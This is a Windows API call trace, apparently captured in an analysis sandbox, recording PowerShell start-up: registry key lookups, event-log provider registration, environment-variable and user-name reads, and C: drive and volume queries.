	[0387.435] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.435] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x37c) returned 0x0
	[0387.435] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.435] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x380) returned 0x0
	[0387.435] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x0) returned 0x2
	[0387.435] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x384) returned 0x0
	[0387.435] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d018 | out: phkResult=0x24d018*=0x388) returned 0x0
	[0387.435] RegCloseKey (hKey=0x388) returned 0x0
	[0387.435] RegCloseKey (hKey=0x364) returned 0x0
	[0387.436] RegCloseKey (hKey=0x384) returned 0x0
	[0387.440] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8c0008
	[0387.743] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da57f8*="WSMan", lpRawData=0x2da5568) returned 1
	[0387.745] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.745] CoTaskMemFree (pv=0x1b770f20) 
	[0387.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.747] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0387.747] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0387.748] CoTaskMemFree (pv=0x1b793160) 
	[0387.748] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.748] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0387.748] CoTaskMemFree (pv=0x1027c0) 
	[0387.748] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dab1d8*="Alias", lpRawData=0x2daaf68) returned 1
	[0387.749] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.750] CoTaskMemFree (pv=0x1b770f20) 
	[0387.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.752] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0387.752] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0387.752] CoTaskMemFree (pv=0x1b793160) 
	[0387.752] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.752] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0387.752] CoTaskMemFree (pv=0x1027c0) 
	[0387.753] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2db07d0*="Environment", lpRawData=0x2db0560) returned 1
	[0387.754] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.754] CoTaskMemFree (pv=0x1b770f20) 
	[0387.755] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.755] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0387.755] CoTaskMemFree (pv=0x1b770f20) 
	[0387.755] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.755] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0387.755] CoTaskMemFree (pv=0x1b770f20) 
	[0387.756] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0387.756] SetErrorMode (uMode=0x1) returned 0x1
	[0387.756] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0387.756] SetErrorMode (uMode=0x1) returned 0x1
	[0387.757] GetLogicalDrives () returned 0x4
	[0387.758] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.759] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0387.759] SetErrorMode (uMode=0x1) returned 0x1
	[0387.760] CoTaskMemAlloc (cb=0x68) returned 0x171d20
	[0387.760] CoTaskMemAlloc (cb=0x68) returned 0x1b77ad90
	[0387.760] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x171d20, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d030, lpMaximumComponentLength=0x24d02c, lpFileSystemFlags=0x24d028, lpFileSystemNameBuffer=0x1b77ad90, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d030*=0x9c354b42, lpMaximumComponentLength=0x24d02c*=0xff, lpFileSystemFlags=0x24d028*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0387.760] CoTaskMemFree (pv=0x171d20) 
	[0387.760] CoTaskMemFree (pv=0x1b77ad90) 
	[0387.760] SetErrorMode (uMode=0x1) returned 0x1
	[0387.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0387.760] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.761] SetErrorMode (uMode=0x1) returned 0x1
	[0387.761] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24cfd0 | out: lpFileInformation=0x24cfd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0387.761] SetErrorMode (uMode=0x1) returned 0x1
	[0387.761] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.761] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0387.761] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0387.762] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.762] SetErrorMode (uMode=0x1) returned 0x1
	[0387.762] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24ce00 | out: lpFileInformation=0x24ce00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0387.762] SetErrorMode (uMode=0x1) returned 0x1
	[0387.762] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.762] SetErrorMode (uMode=0x1) returned 0x1
	[0387.762] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24ce00 | out: lpFileInformation=0x24ce00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0387.762] SetErrorMode (uMode=0x1) returned 0x1
	[0387.763] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0387.763] SetErrorMode (uMode=0x1) returned 0x1
	[0387.763] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24cea0 | out: lpFileInformation=0x24cea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0387.763] SetErrorMode (uMode=0x1) returned 0x1
	[0387.763] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0387.763] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0387.763] CoTaskMemFree (pv=0x1b793160) 
	[0387.763] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.763] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0387.764] CoTaskMemFree (pv=0x1027c0) 
	[0387.764] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2db78c0*="FileSystem", lpRawData=0x2db7650) returned 1
	[0387.765] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.765] CoTaskMemFree (pv=0x1b770f20) 
	[0387.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.767] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0387.767] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0387.768] CoTaskMemFree (pv=0x1b793160) 
	[0387.768] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0387.768] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0387.768] CoTaskMemFree (pv=0x1027c0) 
	[0387.769] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbd100*="Function", lpRawData=0x2dbce90) returned 1
	[0387.772] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0387.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.772] CoTaskMemFree (pv=0x1b770f20) 
	[0387.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.492] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0388.492] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0388.492] CoTaskMemFree (pv=0x1b793160) 
	[0388.492] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0388.492] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0388.492] CoTaskMemFree (pv=0x1027c0) 
	[0388.493] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2def390*="Registry", lpRawData=0x2def120) returned 1
	[0388.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.992] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0388.992] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0388.992] CoTaskMemFree (pv=0x1b793160) 
	[0388.992] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0388.992] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0388.992] CoTaskMemFree (pv=0x1027c0) 
	[0388.993] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df47a8*="Variable", lpRawData=0x2df4538) returned 1
	[0388.995] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0388.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.995] CoTaskMemFree (pv=0x1b770f20) 
	[0388.998] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0388.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.998] CoTaskMemFree (pv=0x1b770f20) 
	[0389.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0389.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0389.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0389.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0389.568] CoTaskMemAlloc (cb=0x804) returned 0x1b793160
	[0389.569] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b793160, nSize=0x24d2a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d2a8) returned 0x1
	[0389.569] CoTaskMemFree (pv=0x1b793160) 
	[0389.569] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0389.569] GetUserNameW (in: lpBuffer=0x1027c0, pcbBuffer=0x24d2e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d2e8) returned 1
	[0389.569] CoTaskMemFree (pv=0x1027c0) 
	[0389.570] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e083c0*="Certificate", lpRawData=0x2e08150) returned 1
	[0390.223] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0390.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.224] CoTaskMemFree (pv=0x1b770f20) 
	[0390.226] GetLogicalDrives () returned 0x4
	[0390.226] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0390.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0390.227] CoTaskMemAlloc (cb=0x20e) returned 0x152b10
	[0390.227] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x152b10 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0390.227] CoTaskMemFree (pv=0x152b10) 
	[0390.229] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0390.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.229] CoTaskMemFree (pv=0x1b770f20) 
	[0390.229] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0390.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.229] CoTaskMemFree (pv=0x1b770f20) 
	[0390.244] CoTaskMemAlloc (cb=0x104) returned 0x1b770f20
	[0390.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770f20, nSize=0x80 | out: lpBuffer="") returned 0x0
